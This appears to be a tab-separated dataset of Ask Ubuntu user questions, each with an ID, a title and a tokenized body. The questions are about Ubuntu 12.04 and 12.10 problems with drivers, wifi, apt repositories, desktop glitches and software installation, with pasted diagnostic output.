277959	installing gnome 3.8 on ubuntu 12.04	gnome 3.8 is released and i wanted to have it on my system running ubuntu 12.04 . i came across this : gnome 3.8 on ubuntu 12.04.2 lts in the answers , it is mentioned that gnome 3.8 is not available in 12.04 in a straight forward way . can someone please explain why ? as far as my understanding , the version 3.8 will be available through software centre only when canonical provides it through their updates . i have installed gnome 3 through the ppa provided by the gnome 3 team . so shouldnât it be available as soon as a newer version is released in the ppa ? or , does it still depend on the os version also ? the solution mentioned here adds three ppas to the software source . http : //www.ubuntukiller.com/2013/03/how-to-installupgrade-gnome-38-in.html the first ppa ( gnome 3 team ) is the one i already have . what are the other two ppas supposed to do ?
277961	graphics.h , conio.h and dos.h not working in gcc	i am working on a project related to mouse programming . i am having a problem that graphics.h , conio.h and dos.h not working in gcc . i tried http : //blog.eternal-thinker.com/2010/09/how-to-use-graphicsh-in-ubuntu.html . when i entered sudo apt-get install build-essential i got : reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . build-essential set to manually installed . the following packages were automatically installed and are no longer required : calligra-l10n-engb cdparanoia k3b k3b-data k3b-i18n kdevelop-l10n kdevelop-php-docs-l10n kdevelop-php-l10n language-pack-kde-en libflac++6 libk3b6 libkcddb4 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . then i tried sudo apt-get install libsdl-image1.2 libsdl-image1.2-dev guile-1.8 guile-1.8-dev libsdl1.2debian-all libart-2.0-dev libaudiofile-dev libesd0-dev libdirectfb-dev libdirectfb-extra libfreetype6-dev libxext-dev x11proto-xext-dev libfreetype6 libaa1 libaa1-dev libslang2-dev libasound2 libasound2-dev and i got the following error : reading package lists ... done building dependency tree reading state information ... done package libsdl1.2debian-all is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libsdl1.2debian e : package 'libsdl1.2debian-all ' has no installation candidate please help me in using graphics.h , conio.h and dos.h in gcc .
277964	is it possible to install gimp on ubuntu server and use it in command line from a php script ?	i have a project where the users will be able to upload images from their browser . the project is coded with php . we need to process the uploaded images with some advanced filters and we need a good result . i googled around and found out that i can use gimp in command line . ( http : //www.gimp.org/tutorials/basic_batch/ ) i know that i can use php exec ( ) to execute external applications . ( http : //php.net/manual/en/function.exec.php ) so my questions are : can i install gimp on ubuntu server with no gui ? is is possible/a good idea to use gimp to process image from php instead of using gd ? thank you all ! i 'm still a noob with ubuntu server and web server stuff .
277971	unrar works really slow compared to winrar ?	is there a particular reason why unrar operations are so slow comparing to winrar on windows . i managed to extract a file faster in virtualbox ( windows 7 guest with winrar ) .
277976	nvidia geforce 9600m gt not enabled	i am at sony vgn-aw220j , iâve installed ubuntu 12.10 recently with unity , i am facing problem with my graphics card . i tried to install nvidia current , nvidia-linux-x86-310.19 but no result . when i am typing lspci| grep vga i get vga compatible controller : nvidia corporation g96 [ geforce 9600m gt ] ( rev a1 ) but when go to system setting > details . i found my graphic card with no driver installed or unknown . any help please thanks in advance
277977	12.04 wifi problems	i recently wiped my hard drive and installed ubuntu 12.04 on my hp sleekbook 6 . everything in the installation went alright and i installed all the updates . the catch is that i can only be on the internet via ethernet cord . my wifi just continues to try to connect and then eventually drops then continues to try . i know the password is right too . can anyone help me ? i also have uverse .
277982	where can i download the beta release for ubuntu ?	according to the 13.04 release schedule , the beta 2 release for 13.04 was made available today ( april 4 ) . does anyone know where i can download it ? thanks !
277987	how to fix fresh ubuntu installation to detect network device ?	i just installed ubuntu on a lg z355 ultrabook . the installation was smooth , but it did not recognize neither wireless nor ethernet connections . how can i find and install such drivers ? $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 )
277988	'apt-get install ' & software center not installed ?	i did the command sudo apt-get purge and all my apt- commands and my software center are no longer installed . when ever i do 'sudo apt-get update ' even , i get 'sudo : apt-get : command not found'
277991	how can i copy a path out of a open/save dialog and paste it into nautilus ?	in windows , i frequently will do things like copy a folder path from a save/open dialog and paste it into the address bar of windows explorer to browse the folder . this seems to be even more needed in ubuntu owing to the crippled file dialog ( ca n't rename , move , delete , etc ) how can i do this in ubuntu ? specifically , how do i : copy paths out of save/open dialogs paste paths into an 'address bar ' so nautilus can go right there
277992	how to set up ubuntu for multiple users at the same time ?	i 'm still kinda new to linux and my understanding was i could let multiple people ( at the most me + two more ) use my pc at the same time . if this is indeed the case , how do i ?
277999	how can i fix `` the package system is broken '' ?	these are the updates : -safe and easy web browser from mozilla firefox -safe and easy web browser from mozilla- unity menubar integration firefox-gobalmenu -safe and easy web browser from mozilla-gnome support firefox-gnome-support -linux kernal image for version 3.5.0 on 32 bit x86 smp linux-image-3.5.0-gereric ( new install ) and this is the output : the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f details : the following packages have unmet dependencies : linux-image-generic-lts-quantal : depends : linux-image-3.5.0-26-generic but it is not installed
278000	how to use commands with parameters that start with a dash `` - '' ?	this may be a simple question , but how do i use files starting with `` - '' with command line programs ? for example , i am trying to use pdfgrep on a file named -2013-01-01.pdf but it complains that there are no options defined for 2 , 0 , 1 , 3 and so on . changing the filename to something that does not start with `` - '' solves it , but this is not an option since the files are n't created by me . i simply want to check for a specific change i know is coming .
278004	how do i enable thumbnails for text files in nautilus ?	i used to have thumbnails for text files in nautilus but i do n't have them anymore . i 'm on ubuntu 12.10 , i have n't disabled them as per how to stop nautilus from creating thumbnails of specific file types ? and they are displayed for other file types like pdf and videos .
278007	keyboard starts skipping characters after wake from suspension/sleep , restart required .	after my computer wakes from sleep the keyboard is starting to skip characters unless i type very very slow . the only solution i have found is to restart the computer . being linux i guess there most be a quicker way to fix this error , maybe by restarting the service that is handling the input or something similar that will save me time instead of doing a reboot . computer is an dell vostro v13 with ubuntu 12.10 if that helps .
278009	how can i install a later version of solr-jetty via apt-get ?	using apt-get to install solr-jetty only gives me version 1.4 of solr , but i would like to use one of the 3.x versions . i 'm not yet confident enough to do a manual installation ( something usually goes wrong or i end up irreversibly breaking something ) . is there a way i can easily install the version of solr-jetty for i want for my version of ubuntu via apt-get ? as an update to the question , i have tried the ppa in the suggested question , however , it did not work . i am told that this is because it is for a different version of ubuntu . this is the error i receive at the end of running apt-get update : fetched 2,535 kb in 7s ( 354 kb/s ) w : failed to fetch http : //ppa.launchpad.net/gasol-wu/oneiric/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/gasol-wu/oneiric/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gasol-wu/oneiric/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i have also tried an installation of jetty and openjdk using apt-get , but this resulted in jetty not starting as a service .
278013	graphic driver segfault on lenovo g780 for nvidia geforce gt 635m	i recently installed ubuntu 12.10 on my new lenovo g780 . i followed these instructions to install the drivers for my graphics card . when i reboot i can log in , but nothing happens after . i switched to a virtual terminal and ran dmesg . i got this : [ 202.106458 ] compiz [ 2028 ] : segfault at 30 ip 00007fb16b0b7576 sp 00007ffffa1d27f0 error 4 in libgrid.so [ 7fb16b0a5000+27000 ] this was the error i got when i installed the drivers : debug : parsing /usr/share/ubuntu-drivers-common/quirks/dell_latitude debug : parsing /usr/share/ubuntu-drivers-common/quirks/put_your_quirs i let the system do a bug report , but i was wondering if anybody has found a fix . thanks for your time . if there 's any other information about the computer you need , let me know .
278015	docky artifacting on edges	i 've got 2 laptops running quantal 32-bit , one with a 2nd gen core i5 and another with a 3rd gen core i3 . on my i5 laptop , docky in 3d mode produces a translucent green artifact on both the left and right side while moving my cursor over the icons ( with or without zoom enabled ) . from what i 've read on this forum and others , it seems to be a driver issue . however , both my laptops are using the i915 driver and the issue does not occur on my i3 laptop at all . any advice on this would be much appreciated , as i have exhausted every solution i have found . thanks in advance ! edit : here 's a screenshot of the issue : edit 2 : the screenshot here does n't do as good a job as i 'd like in illustrating the issue . the faint green artifacts on the edges actually flicker with varying intensity as i move my mouse over the icons .
278016	is there a way to install ubuntu to windows me without a usb drive or burning a disk ?	i have windows me on a pc that i want to install ubuntu to but i do n't have a cd burner and at present do n't have access to a usb drive . if i had to i could get a usb drive but i was hoping to avoid that . i did a search on google and the most relevant information i could find was at https : //help.ubuntu.com/community/installation/fromwindows however when i try to do `` the netboot approach '' in step 2 it tells me to `` download linux and initrd.gz from http : //archive.ubuntu.com/ubuntu/dists/gutsy/main/installer-i386/current/images/netboot/ubuntu-installer/i386/ `` but when i click the link to do this i get a `` the requested url was not found '' message . could someone please tell me where i can find linux and initrd.gz or tell me another way that i can go about installing ubuntu without a cd or usb drive ? thanks for any help in advance .
278018	online accounts + facebook + issue [ 12.10 64bits ]	as many of us , i also having some trouble to add the facebook account using `` online accounts '' . i used some of answers i found here , doing that step-by-step : log in the facebook account , access my apps , but when i reached this one , i noticed that `` ubuntu '' application simply does n't exist , then i can not remove it from facebook , of course . i was looking for the ubuntu application in the facebook app database , but neither there i found it . does anyone having the same issue ?
278019	xmodmap alternative for the text console ( tty ) ?	there is a keyboard with ' key broken . i 've remapped it to the wake button with xmodmap but that affects only x session , how can i achieve this for ttys ? note : editing keymap files directly is not the best option since i want the system to be upgradeable .
278020	failure in downloading repository information	i update my system and all is fine but then after some time a sign appears at the top panel and tells me something is wrong with the some repositories and tells me to do a check for update , when i do i get this error w : gpg error : http : //us.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/index no hash entry in release file /var/lib/apt/lists/partial/archive.canonical.com_ubuntu_dists_precise_partner_i18n_index w : failed to fetch http : //ppa.launchpad.net/clipgrab-team/ppa/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/ppa.launchpad.net_clipgrab-team_ppa_ubuntu_dists_precise_main_i18n_index w : failed to fetch http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/ppa.launchpad.net_otto-kesselgulasch_gimp_ubuntu_dists_precise_main_i18n_index e : some index files failed to download . they have been ignored , or old ones used instead . any help please ? ? ?
278025	apt-get ignores all packages with `` translation-en_us ''	having a problem on an ec2 ubuntu lucid instance where if i run ( sudo ) apt-get update all packages with translation-en_us are ignored . hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid release.gpg ign http : //ap-southeast-2.ec2.archive.ubuntu.com/ubuntu/ lucid/main translation-en_us ign http : //ap-southeast-2.ec2.archive.ubuntu.com/ubuntu/ lucid/universe translation-en_us hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid-updates release.gpg ign http : //ap-southeast-2.ec2.archive.ubuntu.com/ubuntu/ lucid-updates/main translation-en_us ign http : //ap-southeast-2.ec2.archive.ubuntu.com/ubuntu/ lucid-updates/universe translation-en_us hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid release hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid-updates release hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid/main packages hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid/universe packages hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid/main sources hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid/universe sources hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid-updates/main packages hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid-updates/universe packages hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid-updates/main sources hit http : //ap-southeast-2.ec2.archive.ubuntu.com lucid-updates/universe sources hit http : //security.ubuntu.com lucid-security release.gpg hit http : //ppa.launchpad.net lucid release.gpg ign http : //security.ubuntu.com/ubuntu/ lucid-security/main translation-en_us ign http : //security.ubuntu.com/ubuntu/ lucid-security/universe translation-en_us ign http : //ppa.launchpad.net/txwikinger/php5.2/ubuntu/ lucid/main translation-en_us hit http : //security.ubuntu.com lucid-security release hit http : //ppa.launchpad.net lucid release hit http : //security.ubuntu.com lucid-security/main packages hit http : //security.ubuntu.com lucid-security/universe packages hit http : //ppa.launchpad.net lucid/main packages hit http : //security.ubuntu.com lucid-security/main sources hit http : //security.ubuntu.com lucid-security/universe sources just trying to get a little more context around the `` ignore '' , and why it 's only ignoring for translation-en_us
278027	initramfs prompt after boot after using windows installer and receiving ntfs error	i used 'windows installer '' for ubuntu 12.04 tls . all went well and it asked me to reboot . once rebooted , i received some ntfs error in flash and it goes to 'initramfs ' boot prompt with a lot of help commands . i tried mounting /dev/sda1 to /root forcefully , it failed saying no ntfs file system . however i see that c : is ntfs .
278034	deleting a non working version of ubuntu from kubuntu	i had ubuntu 12.10 to replace easy-peasy , however some packages broke and the screen would come up blank after booting/bios , i installed a dual boot of ubuntu 12.10 which works and switched to the kde desktop environment and have recovered all files . i want to delete the non working version from the boot menu , and ca n't find out how , can you help me ? i had it dual booting windows 7 starter and easy-peasy , i then deleted win7 so easy peasy was my only os - i switch os ( s ) like most people change clothes sometimes , however , i really like the new setup and just wish i could use all of my hdd . i replaced easy peasy with the upgrade on ubuntu 12.10 , but some packages were broken causing the graphics to fail , so i now have a broken copy of ubuntu in my boot menu , and a working copy with both gnome and kde installed which i can switch in the login screen , what i want is to delete the non-working version to free up the space on the hard-drive for the working version . unveiledcorgi64 @ unveiledcorgi64-lt40 : ~ $ df -h filesystem size used avail use % mounted on /dev/sda1 146g 21g 118g 16 % / udev 992m 12k 992m 1 % /dev tmpfs 402m 900k 401m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1003m 1.9m 1001m 1 % /run/shm none 100m 24k 100m 1 % /run/user /dev/sda6 146g 2.8g 136g 3 % /media/5f926dfe-f3b6-4ca6-a4ef-c559a888a773 unveiledcorgi64 @ unveiledcorgi64-lt40 : ~ $ mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/unveiledcorgi64/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=unveiledcorgi64 ) /dev/sda6 on /media/5f926dfe-f3b6-4ca6-a4ef-c559a888a773 type ext4 ( rw , nosuid , nodev , uhelper=udisks ) unveiledcorgi64 @ unveiledcorgi64-lt40 : ~ $ sudo parted -l [ sudo ] password for unveiledcorgi64 : model : ata wdc wd3200bpvt-2 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 159gb 159gb primary ext4 boot 2 159gb 320gb 162gb extended 6 159gb 317gb 159gb logical ext4 5 317gb 320gb 3042mb logical linux-swap ( v1 ) unveiledcorgi64 @ unveiledcorgi64-lt40 : ~ $ swapon -s filename type size used priority /dev/sda5 partition 2970620 5248 -1
278035	software center wo n't open since a loss of power	after a power loss on my laptop acer 2920 ubuntu 12.10 the software centre will not open i also have an error symbol on the top bar right hand side . clicking on this symbol gives the following message : - e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_quantal-updates_main_i18n_translation-en % 5fgb , e : the package lists or status file could not be parsed or opened .
278038	kubuntu 12.10 - wireless problems with centrino n-100	i installed kubuntu 12.10 on my dell xps l501x laptop . i cant figure out how to enable my wireless connection . i have windows 7 and the wireless is functional . can anyone help me ? here is a list of commands and their result above sudo lshw -c network sudo rfkill list lspci -nn result lshw : *-network disabled description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : 00:26 : c7:9a:42:24 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-17-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:50 memory : f0400000-f0401fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 06 serial : f0:4d : a2:59 : c0:20 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=10.13.10.211 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:47 ioport:5000 ( size=256 ) memory : f0a04000-f0a04fff memory : f0a00000-f0a03fff result rfkill : 3 : hci0 : bluetooth soft blocked : no hard blocked : no 4 : phy0 : wireless lan soft blocked : no hard blocked : no result lspci : 00:00.0 host bridge [ 0600 ] : intel corporation core processor dram controller [ 8086:0044 ] ( rev 18 ) 00:01.0 pci bridge [ 0604 ] : intel corporation core processor pci express x16 root port [ 8086:0045 ] ( rev 18 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 18 ) 00:16.0 communication controller [ 0780 ] : intel corporation 5 series/3400 series chipset heci controller [ 8086:3b64 ] ( rev 06 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 06 ) 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 06 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 1 [ 8086:3b42 ] ( rev 06 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 2 [ 8086:3b44 ] ( rev 06 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 4 [ 8086:3b48 ] ( rev 06 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 5 [ 8086:3b4a ] ( rev 06 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 6 [ 8086:3b4c ] ( rev 06 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 06 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a6 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b0b ] ( rev 06 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 6 port sata ahci controller [ 8086:3b2f ] ( rev 06 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 06 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 5 series/3400 series chipset thermal subsystem [ 8086:3b32 ] ( rev 06 ) 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0df1 ] ( rev a1 ) 02:00.1 audio device [ 0403 ] : nvidia corporation gf108 high definition audio controller [ 10de:0bea ] ( rev a1 ) 04:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1000 [ 8086:0083 ] 05:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 03 ) 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) ff:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 05 ) ff:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 8086:2d01 ] ( rev 05 ) ff:02.0 host bridge [ 0600 ] : intel corporation core processor qpi link 0 [ 8086:2d10 ] ( rev 05 ) ff:02.1 host bridge [ 0600 ] : intel corporation core processor qpi physical 0 [ 8086:2d11 ] ( rev 05 ) ff:02.2 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d12 ] ( rev 05 ) ff:02.3 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d13 ] ( rev 05 ) when i try this command , i found this result , i think its strange ! dmesg | grep -i firmware [ 0.281185 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 2.701007 ] [ firmware bug ] : acpi ( pegp ) defines _dod but not _dos [ 13.419421 ] iwlwifi 0000:04:00.0 : > loaded firmware version 39.31.5.1 build 35138 [ 19.660624 ] iwlwifi 0000:04:00.0 : > loaded firmware version : 39.31.5.1 build 35138 [ 19.939340 ] iwlwifi 0000:04:00.0 : > loaded firmware version : 39.31.5.1 build 35138 [ 19.956277 ] iwlwifi 0000:04:00.0 : > loaded firmware version : 39.31.5.1 build 35138
278040	unity broken : (	so i updated my computer a while ago ... bad choice . now my desktop is all screwed up . without unity running it runs just fine ... but unity controls everything so its hard to do anything without it . what it is doing is stretching the windows and for that matter anything other than the side bar and top bar . its so stretched you really cant do anything . i do not know how to pull any information about this to provide to the community so if you show me the command ill do it . : ) my computer is custom built . it has a amd 64 proccessor and a radeon 4650 . i am on 12.05 . dont upgrade to 12.10 because itll fail completely ( since amd droped support for my card )
278044	widgets look ugly after installing amd/ati drivers	i installed video drivers for my ati card and now ( some of ) my windows have ugly widgets . mainly , firefox looks ugly but natuilus looks find . also , my media keyboard buttons stopped working . i can no longer change the volume from my keyboard .
278046	how do i install mods on rigs of rods ?	how to install additional cars and maps on rigs of rods ? i install game from ppa and want install additional cars and maps . sorry for my english .
278049	asus x55c fn key not working	because fn key is not working i cant enable the wifi and also change the brightness of the screen . fn key is partly working for sound up and down and screen off i have installed ubuntu 12.10 . laptop is asus x55c regarding wifi i think wlan card driver installation will also be required . kindly help on these 2 issues , i do n't want windows ..that is y
278050	google chrome causes system freeze	i 'm using xubuntu 12.04 , but google chrome always causes system freezes while i 'm scrolling down a webpage or a drop down box pops out . it is quite strange that tty1 could not be switched but only my mouse can move . so i want to know how to find out what 's wrong with my chrome browser and fix the bug ? thanks .
278052	ubuntu 12.04 wifi problem	i just installed ubuntu 12.04 on an hp pavilion dv6 laptop . after install the wifi card is working but when i try to connect to my secured wifi router it will show as connected but no internet access . how do i fix this problem ?
278053	scrolling items in content assist of eclipse on ubuntu	ubuntu 12.04 lts eclipse juno i have the above softwares . i selected content assist by pressing control+space . i have quite a few entries there . the problem that i am facing is when i press down arrow key , the item in the display does n't change but it scrolls . however scrolling works fine with mouse . has anyone faced a similar issue ?
278054	.profile file not getting updated in ubuntu 12.04 , trouble installing mysql	i 'm trying to install mysql in ubuntu to run ruby on rails . i was going through the tutorial at lynda . i have successfully installed ruby , gem & rails . ruby -v ruby 1.8.7 ( 2011-06-30 patchlevel 352 ) [ x86_64-linux ] gem -v 1.8.15 rails -v rails 2.3.14 now , i am trying to install mysql . to do this , the tutorial asks to update the .profile file by adding a line . # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi i added the following line to it : export path= '' usr/local/bin : /usr/local/sbin : /usr/local/mysql/bin : $ path '' i exited the terminal & opened a new instance . & when i do : echo $ path it gives me : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games mysql is n't coming up in the path . to install mysql , i did : sudo apt-get install mysql-client-core-5.5 & i can see that mysql is installed : which mysql /usr/bin/mysql but i can not see mysql version : mysql -v error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) what do i need to do install mysql . will solving this error allow me to access mysql from the terminal or do i need to do anything else as well ?
278056	how to programatically temporarily prevent standby mode while particular ( cron ) script is running ?	i have a script launched by a cron from an kubuntu 12.04.01 lts laptop to nas . the script simply contains an rsync command backing up the laptop . the problem is that if the system goes into standby mode , while the script is executing , the network manager crashes and the whole thing fails . even without the crash , i would still like the computer to remain awake until the backup is finished . ideally , i would like to add a command at the top of the script to disable standby/hibernation and another at the end of the script to re-enable it before exiting the script . i have seen these two related threads already , but neither quite gives me what i need ( i think ) : automatically sleep and wake-up at specific times how to inhibit suspend temporarily ?
278059	unable to fork : can not allocate memory	frequently getting 'fork : can not allocate memory ' when running commands over ssh . i have 64gb of ram and usually 1~2gb free . swap is more than 8gb free ubuntu version : '' ubuntu 12.04.2 lts '' desktop 64 bit free -m output : total used free shared buffers cached mem : 64386 64079 307 0 9840 41196 -/+ buffers/cache : 13042 51343 swap : 7720 347 7373 ulimit -a output : core file size ( blocks , -c ) 0 data seg size ( kbytes , -d ) unlimited scheduling priority ( -e ) 0 file size ( blocks , -f ) unlimited pending signals ( -i ) 514954 max locked memory ( kbytes , -l ) 64 max memory size ( kbytes , -m ) unlimited open files ( -n ) 1024 pipe size ( 512 bytes , -p ) 8 posix message queues ( bytes , -q ) 819200 real-time priority ( -r ) 0 stack size ( kbytes , -s ) 8192 cpu time ( seconds , -t ) unlimited max user processes ( -u ) 514954 virtual memory ( kbytes , -v ) unlimited file locks ( -x ) unlimited thanks
278060	error in make while installing ndiswrapper	i have problems installing ndiswrapper , i can not run make , it throws the following error : remiii @ remiii-hp : ~ / ndiswrapper-1.58rc1 $ make make-c utils make [ 1 ] : entering directory '/ home/remiii/ndiswrapper-1.58rc1/utils » make [ 1 ] : nothing to be done for 'all ' . make [ 1 ] : leaving directory '/ home/remiii/ndiswrapper-1.58rc1/utils » make-c driver make [ 1 ] : entering directory '/ home/remiii/ndiswrapper-1.58rc1/driver » makefile : 36 : *** can not find kernel version in / lib/modules/3.5.0-26-generic/build , is it configured ? . alto . make [ 1 ] : leaving directory '/ home/remiii/ndiswrapper-1.58rc1/driver » make : *** [ driver ] error 2 help please . result : root @ remiii-hp : ~/ndiswrapper-1.58rc1 # sudo lshw -c network *-network descripción : ethernet interface producto : rtl8101e/rtl8102e pci express fast ethernet controller fabricante : realtek semiconductor co. , ltd. id físico : 0 información del bus : pci @ 0000:06:00.0 nombre lógico : eth0 versión : 05 serie : 84:34:97:81 : a1:16 tamaño : 100mbit/s capacidad : 100mbit/s anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk- napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.35 latency=0 link=yes multicast=yes port=mii speed=100mbit/s recursos : irq:46 ioport:2000 ( size=256 ) memoria : f0204000-f0204ff memoria : f0200000- f0203fff *-network no reclamado descripción : network controller producto : ralink corp. fabricante : ralink corp. id físico : 0 información del bus : pci @ 0000:07:00.0 versión : 00 anchura : 32 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list configuración : latency=0 recursos : memoria : f0110000-f011ffff root @ remiii-hp : ~/ndiswrapper-1.58rc1 # rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no remiii @ remiii-hp : ~/ndiswrapper-1.58rc1 $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 9808 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:10.0 usb controller : advanced micro devices [ amd ] hudson usb xhci controller ( rev 03 ) 00:11.0 sata controller : advanced micro devices [ amd ] hudson sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 